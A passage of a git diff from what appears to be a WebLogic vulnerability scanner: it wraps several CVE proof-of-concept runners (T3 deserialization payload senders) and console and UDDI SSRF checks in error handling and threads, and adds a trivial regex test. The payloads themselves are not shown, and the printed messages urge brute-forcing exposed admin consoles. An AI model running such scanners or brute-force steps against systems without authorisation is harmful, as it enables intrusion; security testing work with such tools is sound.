= sock.recv(1024) @@ -66,16 +67,18 @@ def checkVul(res,server_addr,index): print(('[-]目标weblogic未检测到{}'.format(VUL[index]))) def run(dip,dport,index): - sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) - ##打了补丁之后,会阻塞,所以设置超时时间,默认15s,根据情况自己调整 - sock.settimeout(10) - server_addr = (dip, dport) - t3handshake(sock,server_addr) - buildT3RequestObject(sock,dport) - rs=sendEvilObjData(sock,PAYLOAD[index]) - #print 'rs',rs - checkVul(rs,server_addr,index) - + try: + sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + ##打了补丁之后,会阻塞,所以设置超时时间,默认15s,根据情况自己调整 + sock.settimeout(10) + server_addr = (dip, dport) + t3handshake(sock, server_addr) + buildT3RequestObject(sock, dport) + rs = sendEvilObjData(sock, PAYLOAD[index]) + # print 'rs',rs + checkVul(rs, server_addr, index) + except Exception: + print("CVE_2018_2893脚本出错") if __name__=="__main__": # dip = sys.argv[1] # dport = int(sys.argv[2]) diff --git a/plugins/weblogic_poc/__pycache__/CVE_2015_4852.cpython-37.pyc b/plugins/weblogic_poc/__pycache__/CVE_2015_4852.cpython-37.pyc index 0a165d6aab2af4c7c778bee910ebed1d8bd379d1..09ce5187b6d13d83ffec3965513d58729f4f6ff2 100644 GIT binary patch delta 569 zcmYLFO=}cE5UuK+o$2YBo|%n@HK(lWK~{1|Rs(xhf`^C)0~$dX*7ORaWFoU2(9rE3 z#*eEoUX&bWkAfHR=GDL8Y43_b(0?G-te{=gtEyMk)z$U0|Lc5oMM?p5b~fv~*DigC zUf?XDu;H$fPB#$X$!`rcXn266Y|bn*tZpfsBZ2{g_nB=G%C}tgs+QwPtS?wy~ zZCg3kRc-4j*K+L{w?sm(#4eEKjkUh!#-EjFg%P!{JjLlT@)aomIa>uAknbz8^g}I7 zV8Sjm^@=iGP!w6$xW?;(;p9st>p+LKR1rNQOPn(!74>U6P;W_tMn?V{G^Rm!A|0!w z4oo!1lKyiW@^uGv@=(0O;v#~L5spKu>HN*oaKt^0_uvlXY>%Q{7_8hl^=N$`PuSV1N}V0uH1g=#XYYwmL*GvE>7rj*N&O zKw?Dv01{t-1PdR)xdZt0-n~27cjxKSVX_ z2$w+Mb8fh18ZNkTH18bk%mEmJaVc`OYa>!U8gTF*PPuk~X)P5$1 zR_>=a?gOg^?Q2?YZP0cYq#!_Ymq6^0@g**JyMmVz%S&fUC00c diff --git a/plugins/weblogic_poc/__pycache__/CVE_2016_0638.cpython-37.pyc b/plugins/weblogic_poc/__pycache__/CVE_2016_0638.cpython-37.pyc index e769ce239ca1ce29ef9a6fabe6f1cfefd8cebb56..8cd067c531684e0b21b49e4ae16b9af55f255da4 100644 GIT binary patch delta 839 zcmY*X&1(}u6rb7eY(Ba+8!)KRSWDb!Nvcqa2vXakV5voG(pF&&yQ{8EHgU3nDz!aW z5O2bIY4MO=M8u2qq&M*&@Vt0!F@J&J$@ex@+ZpD^d-LA>-q*aYys9RzCX*_Gbz`)9 z@BOFb{q*(ApskWFS*6>QqD1Y#5@&N=-sZO>-50u|E$sV9wuq8VZWBYA?a9Cqyh|@- zKv2qOvsuvFs1qsxu>gCJ>Xc=6YWZK{ts`LQ2>=WO zg~TNqArH4UaecmGC~Od~`MTpBh#E)#f1$(J^or%Qe7ETtB4qKQaO_YP-wQfD9qbl{ zXfBAI-CIA3jADzqp1;ptxie!3>^QO}Bctot&PqsI{X+WHph2-7Io5KeQ!j(o#tsmu zCBf-DD}Zca4Y;sD*p*2*?G1pZ^FEBxCy%Kg)QxLPRpJ!|;>VU%wnoWwiIQgtU$wax zFt{p=&W5`+X@M*fk6Y-ElArA%Wd|ENS(!F3lt;(R^4P`kpBr0yZ$Iw7{L*`~X~cuC zMsA%+;KZPlgk=zN0HHiLu{d*cVk%0NAq^V>FyxSDZi}VyVi+NT5H*5hZFT~+15*VR z9(25M5ZXEbp&ZpXl`7HSN#T$+%1Xg}apbN6=KiEkqI3q~JVGAfaDx53N?-^T)AVW$ f$28dp`bDYzPoY1L;74(IKvrT(N>P-g68)?{-I1fL delta 768 zcmZ8f&2G~`5cc{fv7N*T#IzKZqEJffq@ofR1h+zSi&`XTPyxvpdl4>)6UGiIQbo9O zKtkFFAbkW>@hnJt;)IkZ;L3~>73i+^)9n0yJF}mjeCby1S1PuG%ij9>eDPc5Mg8t= zyd5hO<(Qo?MiPtIM2*yw{GMqOJ<{eDBhpEVlt+qZ?27O8r&d80!$FepP~33uv9j>p zw~k2#n9XW!SsVuMdxId78t_yyK4USXLSEIBCsF%d+}nG3xPt)=RHj!Dh?$9dh1JBR zjT&1PH#dHb7bwOULY!nUW7Xa7csfu7lyYO7MEppy;rU8t_?m}rx})9}x}~$Ox~#0a z8myrv)DUP<3+e3-@T89sG8|{795OuOv)6X=fvLMwdZlNH&F0Ej+9}VnxX%Zp45+VA zCs;<1#fRGmoxSayyoy)AM#Mw7K;~5f$}(fFLVBLF2BYK-I?QKPQ*G>sjoV>x3-!|U z{eBROAI;Tg>y#)T$W@ZA6SN4f5&Tao=W>=I3HsdkVUzrFVt>EO{Lk#S)~W^5G9A-2 JZ8QHbe*jb$kq!U= diff --git a/plugins/weblogic_poc/__pycache__/CVE_2016_3510.cpython-37.pyc b/plugins/weblogic_poc/__pycache__/CVE_2016_3510.cpython-37.pyc index fff3108bd1424ff910aa6044014b8042388709c9..3e34c4a20b25f6c555d040b7309161b6ab187448 100644 GIT binary patch delta 837 zcmZ8f&ubGw6rS1LB%3t9Y*w@?Ays0#iAd6F(Nd7w20esUYE6xbA!rm*a`z$yK|T0ii0s{B4xR;1zPE{1JHvdudGltz@6CI?((YR1W+W0KFv|Jv zqxbJ3cH;IN?6yglY||d4Xi@EtC1^rd)Wn{*=Tg_FNy8Yw=0i&(cZup>>IdKr=TqXr z$$%TEwM$cI*R;O3=O?cw-pX3Kpxpdfxdpae-!?B+TcdTpa*H*yeW$pC~ZG%P40y8?DiL=OxCw0o57wWCz8ZpmF zgaXxKH*de~e(b;A zQ%9UHYI28RBvTMl2w4C(aA&?;T%KR_#IcL$N8zg96`9dyXV5W)03{fvE->qO(jv3X zYY<@J>x2q4E`+G;bxss|Cra5Iaq5}Lhcoz!SEWm6Ba@B=)UHqf delta 760 zcmY*X&2G~`5cc{nj`Q2pqEtu~p+c?GN<|0>LJlajK|+)SH6e%}$qKdsw}}(R8`MLk z9(e$t;6lP1pq_XIF5Fj~k@5hDD>F_7VXgf%v$NxGX1;y@WZKQ$&E-r9m$~!lMdeFw zyj;DG-ib7kPS}(&vY5vvvL{aypDPp9Q_drrr;_DKZOPV}@weq?XYg9{j#sR%$sLJB0zef{wRt*>`%16Jr*>HFaV zYmV;!r55SNvFnd`Fbr)CtN5{T>GDDqlwXMa&}+O4`mL9Tdp+JO$19ub%#LfDKTp@` zf;NI6$qJ0a zn`oS?Rg_I;;6pH3oaMF{1z&|iY6No*Mn0WQQEs8Re`SRw?_ul(<-t5mgSuk%WlW_uL zG23|hI`he#O5YiU?IvlEO}a}dTGaVtDUQ-m9d$R{3#}1xv?ET`iJ;|>2gHufG2Z!kq+7a|ytEsR!jl)dA;?~{=E0M@xcvAteBQm;J zKX{+5)|oG67nY!YXOQhaL%a6w zcK?cOodsG`!ze5ziAz$1JlomE@%ff*@J@8A73Td@w;lO^i_6&LdYRRPTlMS+hj1b_ zrzA>Jua!0`)siDs&U{H(OW3ixcAuG^Gr8tgK-dICTnxVTUZR=cu=ilA2lGT~-1Wqf zhQi#mt#KP`p9&9M&tdD5)=uU%%FkJOxlpeR0L?c52(@TJu~a?;c3DLaj3_KT9f#$w z0c_+2v|ErRDuTQ{HT{ry=QSc?%W+<#1gD5Q$_r@kJn@uAttP88P3&DAFKWCnSXM% zxix+c9XSNN+SaEl+&}rzDzAIjf#73yLKT`);?xKqlnGDDqw*@y4>dKg1I$@%MP9J2tvX{}x+zL~nWXYXowrO{BBYPO^ zL)<3?v3nOp_T)G4Gu#g#)Mvpr^_+BUx*P6~^Y7;OJLjnO&u!;%sbp(#?4^${e>c83 zYg5a&!9CK3+7US+1T7Mhp&sfdnJX?>m&O0^mazVuTosy!0UL;@AA2U~_*}m>dr3z*VR6`e8+Ad!sxSPS{867Ho^%$z zAI~9yIp9$&&dA!^>t2r6k))g@qc~)TiVVh`U9?Ao*DQF`PPa@k#{2pKL?QK48+AAK%!D@@@WpG^l*ke85V{T=4`Ga zCq@PkEMZDvZf0a;h-AoPieN}#2xib^@%zPSrO8+%3e;CB2{I+jHQva;&^+GQ)WGaT z%dBT});w+B^>WHgO_p2C#U({W(m+MGSPP0W^Gb?Dfb7YFoQC{7Kn4RN6Qckl7b6cN N-(+vjNz5D^i~zSaC%*sy delta 99 zcmZ22@<5o^iI=f~u3197n$keGayLrEotA(%mv+3y#ll_q16 uC{R?B`4)3=Nl}qBkbR4_peQr1WO5j%AtxJ<&%h|a$TfKy=OkuU4n_b3qZBv* diff --git a/plugins/weblogic_poc/__pycache__/CVE_2018_2628.cpython-37.pyc b/plugins/weblogic_poc/__pycache__/CVE_2018_2628.cpython-37.pyc index 043f80f31567dfeb2acf45a122477718e7af2509..bdd49352bec6910fff1daae04d0e72e2cc7b7f1f 100644 GIT binary patch delta 902 zcmZuv-Afcv6u);qc4yc9l(qawiGp;JK2)&PiqMpL5DhcS2!?g;WTU&Y>zTWvAQ%+% z8cZ)r#rob$_z?DY^wPXW(*6TIch0O)N%wMpoUeP%@7!}=7k?Jhlj(Gl;rcYxcyjbH zJ+9rof!a1}ux-B2IZ0gnmK32hRH5!iy3`uF(2iqbLMKVE`^=2ZHe;A0c&UoYW!=&#>=~kR-J@}@L^K8(kujiuLJc&Dp2l5B+^i*n4!|P22!PLXp(<)R-5)4!! zK|pt)jl6M42Ve3RZ)V97K@O#`uv~Y`Vqs+7S+6_3oLgSS`n~A!GYE`pSWLs+&I=rR z53aZ8WAh#8Xi{Au2${<;)ym#3t;1WU0jJ2UmL2bZOdv(x#Pp`^)TCSWOdXlM@9a5y zf?3vgJTblDmXXs`NtOnJubusTAmCj`JLf2cUIW*Y$Hf*O%$OQnKsylePh({zp=_&U!9`;s?`=H(2Ex{Y#7RrG%4HzB@60@8 z-WiR_#99(+oY9s^p}fG!E-_De)S9n4+oTcHyC~D*v^9KnsAvt34i|sC+&g;v;rpx4 z%{RMdTX5Ljw*zquf;<5Y00t1k_`QjxnYoFnh#Z_J`y~W37OKLn!D%vFAxINMtt;T4 zY+8l7H;Dm$0fBLa=aeKjqQ8_;ay-LfjO}1G!?G$R*Rw3pDIE>kY!Bm>C8{}HeQd>FNwQaotG`aw}q(q3%T-byRA1{GmRcgMOl*`%`*sZhwt zv%;M8V)`dYPwIa%H!nhtUV0SY+Z3zf!2Fo^HShP{@2L5%>E3l+hrn?bK0a%Ia+i$7 z8({5|G1;dFl;Vpsvc46ti-&tN|D!;N9vVn;EiEjdruQT<+A3Wr@nHp`#qnQSsmviU7k1k-1IpA?3j(=}I zTJ;Tn5&XQE1>+=Qdx{RGqnylRhc8(8vOVlJAuXLQtVWAkP3H^X32_EIxFQ_t9^7;j zK!8$$>`=J!&G{8C(?VODAb&qE&(!Be%1N0JagX(ff|tP0>j?7z%6iaxvbx^7pLOwb zN{`|JKaJsQ2nB?UxyI9fIqQ6wv>+ixMF=fx4z)pHhk6>vF_awyy-qwzf`Dg2pd@}( zSwRr>LvUWlBt3ndPW5hp$*&^ZLhup(rkk<+{ddyou^>=Jhi|{)w;@~UxcQ9ziA=7E V|9EnFwo$U|f?cumb`g1c^cNn6oZJ8a diff --git a/plugins/weblogic_poc/__pycache__/CVE_2018_2893.cpython-37.pyc b/plugins/weblogic_poc/__pycache__/CVE_2018_2893.cpython-37.pyc index a3dc485f42977f9af19428fec5d2913764e37900..692b4aae1c8669e33c2f54e89790ee9c9a2dd830 100644 GIT binary patch delta 865 zcmZuv%}*0i5PxsKx-DJU)~W#-E*fEjUqE7@(I`lx2LeVBg_w}iU3H;sm)TbW350_t zo;LtYYYMFRW8S%8lO};2O0uxf@N4e$(0y;E;YDISiOKP>|1^;6LS+b_fYgI24em!t> zuqajssZ(KPy;iTdQUx!P+&g4?Ot&NQ0?RG0`ZZ)aUJ(^1-tX+?eet)>gROHEK@Y(X z#1Vy=hZBwl7brZHBXvJ;y*0_hlX1=JbFaEI)2NluEu#NpSa4P;=rDkCRV58BY8F{< z)R;&wWgz5?w#c~33!IKw7ATKd(sgyRMU826Qly#k z{NUAr;rYSgk)a&>>)7QgN8*@6^0L7srx0(}TFb#HWbVrq0eAqVG4 ze+j`cr0V*i)ZMTS0tI!C_=oJ+Z7+1KhWVo5kSi55Lb`HE0Uo1Mq zLli0*CI=;{M(Yt=CfzlHeu94~9x^M%uZvyw@yH!EGTtxtc9>?HnZsk58qL=q>W;Mb delta 776 zcmZuv-D(p-6rS1tY<_D~B$%K=ZCq4}ib%ZC*hCO(Dov~?!jkNcx^1#a&rYO5rSITg z*_$ShAieT2L@#6>K*)t};DvKG#iBTHK4#9GIp=)enXh+#*0T4rS)0gZuO7YZf65m1 z+6{TyClj(yrY}x6M3WiO(;drRC$>iwnlHq70j9_zFu25|9ERuMa=s`h3^1 zUE1Qo@La-VWo!tUqucwwfK0Zf~qT za@(EFX8p0SBgT0!V8by7sThGW!iof8KB+%n->5f|@{S=?KNtz!9}R)SHH=CmN=PXX z{h_l=Aeos8l#-o)x2q?tp#amOVg-Ee*?$yrhotd diff --git a/plugins/weblogic_poc/__pycache__/managerURL200.cpython-37.pyc b/plugins/weblogic_poc/__pycache__/managerURL200.cpython-37.pyc index 62b47651a9260b69d736d719ca78c747ddbe6459..6835aeaa375ea8737585a3e9d83656ec7f1c9631 100644 GIT binary patch delta 212 zcmeyyd7O*SiI)D(&Puq9BoHA3BwTKTWU&I0=Zm|{=W#*OKVoS>}%1tb}#pzm+ yoLW$lnV&aVmqkMaq>h1+iII;{hEaft2S^u*OipGoXB3${nSu*ti delta 131 zcmX@k^^KFyiI*ROLlH9jAT`Q7P3raHc^Cq*isEY6b)iW?MG4e68 dF)A_f0O=y($rdc;jKY%(SVGvjI2gHrVgMQ5D~bRB delta 129 zcmbQmb()jUiIP6P{UBe*vyo|n9WpVHkpIj zfGvd~m_d_$avbvpX-$?QKA@sotOZ4xc_p{l((;RP6HAI%fMS#VSX6mHMlmq*F={Xs X2~BQiF=rH-yq_h6osEN$3n&Tz;)WVZ diff --git a/plugins/weblogic_poc/managerURL200.py b/plugins/weblogic_poc/managerURL200.py index 7530763..34cda4e 100644 --- a/plugins/weblogic_poc/managerURL200.py +++ b/plugins/weblogic_poc/managerURL200.py @@ -19,11 +19,14 @@ def islive(ur,port): return r.status_code def run(url,port): - if islive(url,port)==200: - u='http://' + str(url)+':'+str(port)+'/console/login/LoginForm.jsp' - print(("[+]目标weblogic控制台地址暴露!\n[+]路径为:{}\n[+]请自行尝试弱口令爆破!".format(u))) - else: - print("[-]目标weblogic控制台地址未找到!") + try: + if islive(url, port) == 200: + u = 'http://' + str(url) + ':' + str(port) + '/console/login/LoginForm.jsp' + print(("[+]目标weblogic控制台地址暴露!\n[+]路径为:{}\n[+]请自行尝试弱口令爆破!".format(u))) + else: + print("[-]目标weblogic控制台地址未找到!") + except Exception: + print("managerURL200脚本出错") if __name__=="__main__": url = sys.argv[1] diff --git a/plugins/weblogic_poc/uddi_ssrf.py b/plugins/weblogic_poc/uddi_ssrf.py index 282bbcb..4938462 100644 --- a/plugins/weblogic_poc/uddi_ssrf.py +++ b/plugins/weblogic_poc/uddi_ssrf.py @@ -20,10 +20,14 @@ def islive(ur,port): return r.status_code def run(url,port): - if islive(url,port)==200: - print(('[+]目标weblogic存在UDDI组件!\n[+]路径为:{}\n[+]请自行验证SSRF漏洞!'.format('http://' + str(url)+':'+str(port)+'/uddiexplorer/'))) - else: - print("[-]目标weblogic UDDI组件默认路径不存在!") + try: + if islive(url, port) == 200: + print(('[+]目标weblogic存在UDDI组件!\n[+]路径为:{}\n[+]请自行验证SSRF漏洞!'.format( + 'http://' + str(url) + ':' + str(port) + '/uddiexplorer/'))) + else: + print("[-]目标weblogic UDDI组件默认路径不存在!") + except Exception: + print("uudi_ssrf脚本出错") if __name__=="__main__": url = sys.argv[1] diff --git a/plugins/weblogic_special_plugin_.py b/plugins/weblogic_special_plugin_.py index 81dfa86..ab90f0c 100644 --- a/plugins/weblogic_special_plugin_.py +++ b/plugins/weblogic_special_plugin_.py @@ -8,44 +8,62 @@ from plugins.weblogic_poc import CVE_2018_2628 from plugins.weblogic_poc import CVE_2018_2893 from plugins.weblogic_poc import managerURL200 from plugins.weblogic_poc import uddi_ssrf +import threading import socket def weblogic_special_plugin_(arg,config): port=7001 ip=socket.gethostbyname(arg.url.strip("http://").strip("https://")) + threads=[] + threads.append(threading.Thread(CVE_2015_4852.run(ip,port))) + threads.append(threading.Thread(CVE_2016_0638.run(ip,port,0))) + threads.append(threading.Thread(CVE_2016_3510.run(ip,port,0))) + threads.append(threading.Thread(CVE_2017_3248.run(ip,port,0))) + threads.append(threading.Thread(CVE_2017_3506.run(ip,port))) + threads.append(threading.Thread(CVE_2018_2893.run(ip,port,0))) + threads.append(threading.Thread(CVE_2018_2628.run(ip,port,0))) + threads.append(threading.Thread(managerURL200.run(ip,port))) + threads.append(threading.Thread(uddi_ssrf.run(ip,port))) #print(arg.url) - try: - CVE_2015_4852.run(ip,port) + for thread in threads: + thread.start() + for j in threads: + j.join() + + ''' + try: + threads[0].strat() except Exception: print("CVE_2015_4852 脚本出错") try: - CVE_2016_0638.run(ip,port,0) + threads[1].start() except Exception: print("CVE_2016_0638 脚本出错") try: - CVE_2016_3510.run(ip,port,0) + threads[2].start() except Exception: print("CVE_2016_3510 脚本出错") try: - CVE_2017_3248.run(ip,port,0) + threads[3].start() except Exception: print("CVE_2017_3248 脚本出错") try: - CVE_2017_3506.run(ip,port) + threads[4].start() except Exception: print("CVE_2017_3506 脚本出错") try: - CVE_2018_2893.run(ip,port,0) + threads[5].start() except Exception: print("CVE_2018_2893 脚本出错") try: - CVE_2018_2628.run(ip,port,0) + threads[6].start() except Exception: print("CVE_2018_2628 脚本出错") try: - managerURL200.run(ip,port) + threads[7].start() except Exception: print("managerURL200 脚本出错") try: - uddi_ssrf.run(ip,port) + threads[8].start() except Exception: - print("uddi_ssrf 脚本出错") \ No newline at end of file + print("uddi_ssrf 脚本出错") + ''' \ No newline at end of file diff --git a/test.py b/test.py new file mode 100644 index 0000000..de29f57 --- /dev/null +++ b/test.py @@ -0,0 +1,4 @@ +import re +url="https://baidu.comas.as" +if re.match(r"{2}\w.+$", url): + print("aaaaaaa") \ No newline at end of file